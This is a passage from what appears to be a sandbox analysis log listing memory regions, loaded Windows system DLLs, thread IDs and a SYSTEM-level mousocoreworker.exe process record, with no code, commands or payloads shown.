0x7fffc0966fff monitored = 0 entry_point = 0x7fffc0862bb0 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 3727 start_va = 0x7fffc17b0000 end_va = 0x7fffc17bafff monitored = 0 entry_point = 0x7fffc17b1f70 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3728 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3729 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 3730 start_va = 0x7fffc3760000 end_va = 0x7fffc376dfff monitored = 0 entry_point = 0x7fffc3762a40 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 3731 start_va = 0x7fffc43d0000 end_va = 0x7fffc446ffff monitored = 0 entry_point = 0x7fffc43d4570 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 3732 start_va = 0x7fffc4720000 end_va = 0x7fffc4756fff monitored = 0 entry_point = 0x7fffc4721a00 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 3733 start_va = 0x7fffc4780000 end_va = 0x7fffc4795fff monitored = 0 entry_point = 0x7fffc4784250 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 3734 start_va = 0x7fffc47a0000 end_va = 0x7fffc47d8fff monitored = 0 entry_point = 0x7fffc47bfcf0 region_type = mapped_file name = "windows.devices.radios.dll" filename = "\\Windows\\System32\\Windows.Devices.Radios.dll" (normalized: "c:\\windows\\system32\\windows.devices.radios.dll") Region: id = 3735 start_va = 0x7fffc4a20000 end_va = 0x7fffc51b0fff monitored = 0 entry_point = 0x7fffc4a35f30 region_type = mapped_file name = "onecoreuapcommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecoreuapcommonproxystub.dll") Region: id = 3736 start_va = 0x7fffc5270000 end_va = 0x7fffc5280fff monitored = 0 entry_point = 0x7fffc5276a80 region_type = mapped_file name = "coloradapterclient.dll" filename = "\\Windows\\System32\\coloradapterclient.dll" (normalized: "c:\\windows\\system32\\coloradapterclient.dll") Region: id = 3737 start_va = 0x7fffc5290000 end_va = 0x7fffc533dfff monitored = 0 entry_point = 0x7fffc529b110 region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\System32\\mscms.dll" (normalized: "c:\\windows\\system32\\mscms.dll") Region: id = 3738 start_va = 0x7fffc5340000 end_va = 0x7fffc53a0fff monitored = 0 entry_point = 0x7fffc537edb0 region_type = mapped_file name = "dispbroker.desktop.dll" filename = "\\Windows\\System32\\DispBroker.Desktop.dll" (normalized: "c:\\windows\\system32\\dispbroker.desktop.dll") Region: id = 3739 start_va = 0x7fffc5c50000 end_va = 0x7fffc5c6cfff monitored = 0 entry_point = 0x7fffc5c56d40 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3740 start_va = 0x7fffc65e0000 end_va = 0x7fffc66d4fff monitored = 0 entry_point = 0x7fffc6622860 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3741 start_va = 0x7fffc6740000 end_va = 0x7fffc6753fff monitored = 0 entry_point = 0x7fffc67428c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3742 start_va = 0x7fffc6760000 end_va = 0x7fffc688ffff monitored = 0 entry_point = 0x7fffc67fdcf0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 3743 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 3744 start_va = 0x7fffc7600000 end_va = 0x7fffc7959fff monitored = 0 entry_point = 0x7fffc7682d50 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 3745 start_va = 0x7fffc7960000 end_va = 0x7fffc7a51fff monitored = 0 entry_point = 0x7fffc79b70f0 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 3746 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3747 start_va = 0x7fffc8320000 end_va = 0x7fffc8aa9fff monitored = 0 entry_point = 0x7fffc84dc050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3748 start_va = 0x7fffc8ac0000 end_va = 0x7fffc8ae2fff monitored = 0 entry_point = 0x7fffc8ac3700 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3749 start_va = 0x7fffc8e50000 end_va = 0x7fffc8e9bfff monitored = 0 entry_point = 0x7fffc8e59820 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 3750 start_va = 0x7fffc9000000 end_va = 0x7fffc9032fff monitored = 0 entry_point = 0x7fffc9006930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3751 start_va = 0x7fffc9150000 end_va = 0x7fffc91e0fff monitored = 0 entry_point = 0x7fffc9175d30 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 3752 start_va = 0x7fffc9230000 end_va = 0x7fffc9263fff monitored = 0 entry_point = 0x7fffc9236e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3753 start_va = 0x7fffc9270000 end_va = 0x7fffc9279fff monitored = 0 entry_point = 0x7fffc9271850 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 3754 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 3755 start_va = 0x7fffc9360000 end_va = 0x7fffc9376fff monitored = 0 entry_point = 0x7fffc9361d60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3756 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3757 start_va = 0x7fffc95d0000 end_va = 0x7fffc95dbfff monitored = 0 entry_point = 0x7fffc95d1ce0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3758 start_va = 0x7fffc95e0000 end_va = 0x7fffc96a9fff monitored = 0 entry_point = 0x7fffc960bc80 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3759 start_va = 0x7fffc98a0000 end_va = 0x7fffc9909fff monitored = 0 entry_point = 0x7fffc98b0e90 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3760 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3761 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3762 start_va = 0x7fffc9ad0000 end_va = 0x7fffc9b29fff monitored = 0 entry_point = 0x7fffc9adb770 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3763 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 3764 start_va = 0x7fffc9bb0000 end_va = 0x7fffc9beafff monitored = 0 entry_point = 0x7fffc9bb4000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 3765 start_va = 0x7fffc9bf0000 end_va = 0x7fffc9c16fff monitored = 0 entry_point = 0x7fffc9bf6200 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 3766 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3767 start_va = 0x7fffc9ec0000 end_va = 0x7fffc9eebfff monitored = 0 entry_point = 0x7fffc9ec7370 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3768 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 3769 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3770 start_va = 0x7fffc9f80000 end_va = 0x7fffca021fff monitored = 0 entry_point = 0x7fffc9faca60 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3771 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3772 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3773 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3774 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3775 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3776 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 3777 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3778 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 3779 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3780 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 3781 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3782 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3783 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3784 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3785 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3786 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3787 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3788 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3789 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3790 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3791 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3792 start_va = 0x7fffcb9d0000 end_va = 0x7fffcba48fff monitored = 0 entry_point = 0x7fffcb9f28f0 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 3793 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3794 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3795 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3796 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3797 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3798 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3799 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4016 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Thread: id = 308 os_tid = 0x664 Thread: id = 309 os_tid = 0xdbc Thread: id = 310 os_tid = 0x974 Thread: id = 311 os_tid = 0xa80 Thread: id = 312 os_tid = 0xa2c Thread: id = 313 os_tid = 0xa1c Thread: id = 314 os_tid = 0x9a4 Thread: id = 315 os_tid = 0x3e4 Thread: id = 316 os_tid = 0x634 Thread: id = 317 os_tid = 0x5ac Thread: id = 318 os_tid = 0x5a8 Thread: id = 319 os_tid = 0x5a4 Thread: id = 320 os_tid = 0x540 Thread: id = 321 os_tid = 0x4d0 Thread: id = 322 os_tid = 0x4cc Thread: id = 323 os_tid = 0x4c8 Thread: id = 324 os_tid = 0x43c Thread: id = 325 os_tid = 0x434 Thread: id = 326 os_tid = 0x42c Thread: id = 327 os_tid = 0x408 Thread: id = 335 os_tid = 0x11d0 Process: id = "16" image_name = "mousocoreworker.exe" filename = "c:\\windows\\system32\\mousocoreworker.exe" page_root = "0x132ea000" os_pid = "0xa10" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x310" cmd_line = "C:\\Windows\\System32\\mousocoreworker.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "S-1-5-80-2949785411-1458004381-4011503523-1439849274-3428788682" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "S-1-5-80-1139522462-2689595747-457373284-4037083511-4201549542" [0xa], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "S-1-5-80-3577588319-513283748-931039988-2701962192-2148388740" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bdae" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4080 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4081 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4082 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4083 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4084 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4085 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4086 start_va = 0xf0000 end_va = 0x1b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4087 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4088 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4089 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4090 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4091 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4092 start_va = 0x400000 end_va = 0x417fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4093 start_va = 0x420000 end_va = 0x437fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 4094 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 4095 start_va = 0x450000 end_va = 0x457fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 4096 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4097 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4098 start_va = 0x570000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4099 start_va = 0x5f0000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 4100 start_va = 0x670000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4101 start_va = 0x6f0000 end_va = 0x6f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 4102 start_va = 0x700000 end_va = 0x700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 4103 start_va = 0x710000 end_va = 0x710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 4104 start_va = 0x720000 end_va = 0x724fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 4105 start_va = 0x730000 end_va = 0x73ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 4106 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 4107 start_va = 0x750000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4108 start_va = 0x850000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 4109 start_va = 0x8d0000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 4110 start_va = 0x950000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 4111 start_va = 0xb50000 end_va = 0xcd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 4112 start_va = 0xce0000 end_va = 0xda0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 4113 start_va = 0xdb0000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 4114 start_va = 0xe30000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 4115 start_va = 0xf30000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 4116 start_va = 0xfb0000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 4117 start_va = 0x10b0000 end_va = 0x10d9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.web.dll.mui" filename = "\\Windows\\System32\\en-US\\Windows.Web.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.web.dll.mui") Region: id = 4118 start_va = 0x10e0000 end_va = 0x121efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4119 start_va = 0x1220000 end_va = 0x141ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 4120 start_va = 0x1420000 end_va = 0x149ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 4121 start_va = 0x14a0000 end_va = 0x17d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = 